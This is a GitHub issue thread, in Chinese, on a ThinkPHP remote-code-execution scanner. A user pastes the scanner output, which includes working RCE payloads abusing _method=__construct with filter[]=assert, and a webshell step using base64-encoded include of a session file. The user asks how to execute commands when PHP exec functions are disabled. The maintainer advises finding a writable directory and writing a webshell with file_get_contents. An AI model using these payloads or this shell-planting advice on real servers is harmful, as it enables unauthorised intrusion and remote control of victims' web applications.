search

sukabuliet / ThinkphpRCE

Thinkphp rce扫描脚本,附带日志扫描
Apache License 2.0
242 stars 29 forks source link

php把基本上所有的执行命令函数都禁用了,但是能读取phpinfo成功,该怎么利用 #2

Open uuuuuuzeus opened 4 years ago

uuuuuuzeus commented 4 years ago

php把基本上所有的执行命令函数都禁用了,但是能读取phpinfo成功,该怎么利用 脚本提示写shell成功,但是测试不能用,下面的payload都能用,但是只能读phpinfo,脚本跑的结果如下,我该怎么进一步执行命令 !] thinkphp_RCE探测: [!] 存在thinkphp_RCE! 可用Payload: http://ip/?s=captcha&test=-1 POST: _method=construct&filter=phpinfo&method=get&server[REQUEST_METHOD]=1 http://ip/?s=captcha&test=-1 POST: _method=construct&filter[]=phpinfo&method=GET&get[]=1 http://ip/?s=captcha&test=phpinfo() POST: _method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=-1

http://ip/?s=index/index/ POST: s=-1&_method=__construct&method=get&filter[]=phpinfo http://ip/?s=index/index/ POST: _method=__construct&method=get&filter[]=phpinfo&get[]=-1

[!] 尝试获取数据库配置: [!] 数据库配置获取失败 [!]正在尝试Getshell: [+] Getshell success, You can use POST http://ip/?s=captcha&r=cGhwaW5mbygpOw== [=] _method=__construct&filter[]=base64_decode&filter[]=think__include_file&method=get&server[]=1&get[]=cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPS90bXAvc2Vzc19oYWhhaGF0ZXN0 [+] r 参数是命令的base64编码

sukabuliet commented 4 years ago

php把基本上所有的执行命令函数都禁用了,但是能读取phpinfo成功,该怎么利用 脚本提示写shell成功,但是测试不能用,下面的payload都能用,但是只能读phpinfo,脚本跑的结果如下,我该怎么进一步执行命令 !] thinkphp_RCE探测: [!] 存在thinkphp_RCE! 可用Payload: http://ip/?s=captcha&test=-1 POST: _method=construct&filter=phpinfo&method=get&server[REQUEST_METHOD]=1 http://ip/?s=captcha&test=-1 POST: _method=construct&filter[]=phpinfo&method=GET&get[]=1 http://ip/?s=captcha&test=phpinfo() POST: _method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=-1

http://ip/?s=index/index/ POST: s=-1&_method=__construct&method=get&filter[]=phpinfo http://ip/?s=index/index/ POST: _method=__construct&method=get&filter[]=phpinfo&get[]=-1

[!] 尝试获取数据库配置: [!] 数据库配置获取失败 [!]正在尝试Getshell: [+] Getshell success, You can use POST http://ip/?s=captcha&r=cGhwaW5mbygpOw== [=] _method=__construct&filter[]=base64_decode&filter[]=think__include_file&method=get&server[]=1&get[]=cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPS90bXAvc2Vzc19oYWhhaGF0ZXN0 [+] r 参数是命令的base64编码

看样子是宝塔吧,,你现在写不进去是可能是因为目录权限不够,主要是找到一个能写的路径,然后file_get_content来写shell